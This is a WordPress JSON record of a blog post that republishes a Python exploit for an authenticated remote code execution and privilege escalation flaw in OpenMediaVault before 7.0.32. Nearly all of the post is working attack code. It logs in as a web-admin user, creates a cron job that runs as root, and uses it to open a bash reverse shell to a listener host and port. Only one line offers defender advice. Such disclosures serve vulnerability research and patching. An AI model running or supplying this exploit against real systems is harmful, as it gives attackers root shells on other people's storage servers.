{"id":56713,"date":"2024-05-09T20:29:40","date_gmt":"2024-05-09T16:29:40","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178526\/openmediavault-execescalate.txt"},"modified":"2024-05-09T20:29:40","modified_gmt":"2024-05-09T16:29:40","slug":"openmediavault-remote-code-execution-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/openmediavault-remote-code-execution-local-privilege-escalation\/","title":{"rendered":"Openmediavault Remote Code Execution \/ Local Privilege Escalation"},"content":{"rendered":"<p># Exploit Title: Openmediavault &lt; 7.0.32 Authenticated RCE &amp; Local Privilege Escalation<br \/># Date: 08.05.2024<br \/># Exploit Author: Mert BENADAM<br \/># Vendor Homepage: https:\/\/www.openmediavault.org\/<br \/># Software Link: https:\/\/sourceforge.net\/projects\/openmediavault\/<br \/># Version: &lt; 7.0.32<br \/># Tested on: OMV 7.0.32 &amp; 6.5 @Virtual Machine<br \/># Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.<\/p>\n<p># Special Thx: k3yZ :)<br \/>&#8220;&#8221;&#8221;<br \/>PoC:<br \/>The vulnerability arises because users in the web-admin group can add commands to the crontab and select root as the user that runs them.<br \/>As a result, authenticated web-admin users can run commands with root privileges and receive reverse shell connections.<br \/>It can also be used in privilege escalation attacks on local systems.<br \/>For defenders: the issue depends on a web-admin account, so limiting membership of that group and reviewing user-defined scheduled jobs that run as root are the relevant checks.<br \/>&#8220;&#8221;&#8221;<\/p>\n<p>import argparse<br \/>import requests<br \/>import json<\/p>\n<p>def login(ip_address, username, password, lhost, lport):<br \/>try:<br \/>login_data = {<br \/>&#8220;service&#8221;: &#8220;Session&#8221;,<br \/>&#8220;method&#8221;: &#8220;login&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;username&#8221;: username,<br \/>&#8220;password&#8221;: password<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = 
f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<\/p>\n<p>response = requests.post(url, json=login_data)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Login Success , Checking User Privilages&#8230;&#8221;)<br \/>post_check(ip_address, response.cookies, lhost , lport)<br \/>else:<br \/>print(&#8220;login Failed, Probably Wrong User Credentials&#8230;&#8221;)<\/p>\n<p>print(&#8220;Reason:&#8221;)<br \/>print(response.json())<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Unexpected Error:&#8221;, e)<\/p>\n<p>def post_check(ip_address, cookies, lhost, lport):<br \/>try:<br \/>post_data = {<br \/>&#8220;service&#8221;: &#8220;Cron&#8221;,<br \/>&#8220;method&#8221;: &#8220;getList&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;type&#8221;: [&#8220;userdefined&#8221;],<br \/>&#8220;start&#8221;: 0,<br \/>&#8220;limit&#8221;: -1<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<br \/>response = requests.post(url, json=post_data, cookies=cookies)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Accesing Crons&#8230;OK&#8221;)<br \/>send_post(ip_address, cookies, lhost , lport)<\/p>\n<p>elif response.status_code == 403:<br \/>print(&#8220;Kullan\u0131c\u0131 yetkili de\u011fil.&#8221;)<br \/>else:<br \/>print(&#8220;Post Request Failure&#8230;&#8221;)<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Beklenmeyen bir hata olu\u015ftu:&#8221;, e)<\/p>\n<p>def send_post(ip_address, cookies, lhost , lport):<br \/>try:<\/p>\n<p>post_data = {<br \/>&#8220;service&#8221;: &#8220;Cron&#8221;,<br \/>&#8220;method&#8221;: &#8220;set&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;uuid&#8221;: 
&#8220;fa4b1c66-ef79-11e5-87a0-0002b3a176b4&#8221;, # UUID<br \/>&#8220;enable&#8221;: True,<br \/>&#8220;execution&#8221;: &#8220;exactly&#8221;,<br \/>&#8220;minute&#8221;: [&#8220;*&#8221;],<br \/>&#8220;everynminute&#8221;: False,<br \/>&#8220;hour&#8221;: [&#8220;*&#8221;],<br \/>&#8220;everynhour&#8221;: False,<br \/>&#8220;dayofmonth&#8221;: [&#8220;*&#8221;],<br \/>&#8220;everyndayofmonth&#8221;: False,<br \/>&#8220;month&#8221;: [&#8220;*&#8221;],<br \/>&#8220;dayofweek&#8221;: [&#8220;*&#8221;],<br \/>&#8220;username&#8221;: &#8220;root&#8221;,<br \/>&#8220;command&#8221;: f&#8221;bash -c &#8216;exec bash -i &amp;&gt;\/dev\/tcp\/{lhost}\/{lport} &lt;&amp;1&#8242;&#8221;, # Command From User<br \/>&#8220;sendemail&#8221;: False,<br \/>&#8220;comment&#8221;: &#8220;&#8221;,<br \/>&#8220;type&#8221;: &#8220;userdefined&#8221;<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<br \/>response = requests.post(url, json=post_data, cookies=cookies)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Payload Sent&#8230; OK,&#8221;)<br \/>update(ip_address, cookies)<br \/>elif response.status_code == 403:<br \/>print(&#8220;User Not Authrorized.&#8221;)<br \/>else:<br \/>print(&#8220;Something Wrong.CHECK your version&#8230;&#8221;)<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Unexpected Error:&#8221;, e)<\/p>\n<p>def update(ip_address, cookies):<br \/>try:<\/p>\n<p>post_data = {<br \/>&#8220;service&#8221;: &#8220;Config&#8221;,<br \/>&#8220;method&#8221;: &#8220;applyChangesBg&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;modules&#8221;: [],<br \/>&#8220;force&#8221;: False<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<\/p>\n<p>response = requests.post(url, json=post_data, 
cookies=cookies)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Updating crontabs&#8230;&#8221;)<br \/>print(&#8220;Successfully Exploited&#8230;&#8221;)<br \/>print(&#8220;Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener&#8230;&#8221;)<br \/>print(&#8220;Warning: Make sure You Open a listener And Enter Correct IP-PORT Information&#8230;&#8221;)<br \/>elif response.status_code == 403:<br \/>print(&#8220;User Not Authrorized.&#8221;)<br \/>else:<br \/>print(&#8220;Someting Wrong. Check version&#8230;&#8221;)<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Unexpected Error:&#8221;, e)<\/p>\n<p>def main():<br \/>font=&#8221;&#8221;&#8221;<\/p>\n<p>\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557<br \/>\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2588\u2588\u2588\u2588\u2557<br \/>\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2554\u255d 
\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2551<br \/>\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551<br \/>\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d<br \/>\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d<\/p>\n<p>&#8220;&#8221;&#8221;<br \/>parser = argparse.ArgumentParser(description=&#8221;OpenMediaVault 7.0.32 &gt; 6.5.0 RCE And Local Privilage Escalation&#8221;)<br \/>parser.add_argument(&#8220;-U&#8221;, &#8220;&#8211;ip&#8221;, type=str, help=&#8221;Victim Ip Adress&#8221;, required=False)<br \/>parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;username&#8221;, type=str, help=&#8221;Username For Web Admin&#8221;, required=False)<br \/>parser.add_argument(&#8220;-p&#8221;, &#8220;&#8211;password&#8221;, type=str, help=&#8221;Password For Web Admin&#8221;, required=False)<br \/>parser.add_argument(&#8220;-L&#8221;, &#8220;&#8211;lhost&#8221;, type=str, 
help=&#8221;Listener IP Adress For Reverse Shell&#8221;, required=False)<br \/>parser.add_argument(&#8220;-P&#8221;, &#8220;&#8211;lport&#8221;, type=str, help=&#8221;Listener Port For Reverse Shell&#8221;, required=False)<\/p>\n<p>args = parser.parse_args()<\/p>\n<p>if args.ip and args.username and args.password and args.lhost and args.lport:<br \/>print(font)<br \/>login(args.ip, args.username, args.password, args.lhost , args.lport)<br \/>else:<br \/>print(font)<br \/>parser.print_help()<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>main()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Openmediavault &lt; 7.0.32 Authenticated RCE &amp; Local Privilege Escalation# Date: 08.05.2024# Exploit Author: Mert BENADAM# Vendor Homepage: https:\/\/www.openmediavault.org\/# Software Link: https:\/\/sourceforge.net\/projects\/openmediavault\/# Version: &lt; 7.0.32# Tested on: OMV 7.0.32 &amp; 6.5 @Virtual Machine# Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux. 
# Special Thx: k3yZ :)&#8220;&#8221;&#8221;PoC:This &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56713","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56713"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56713\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}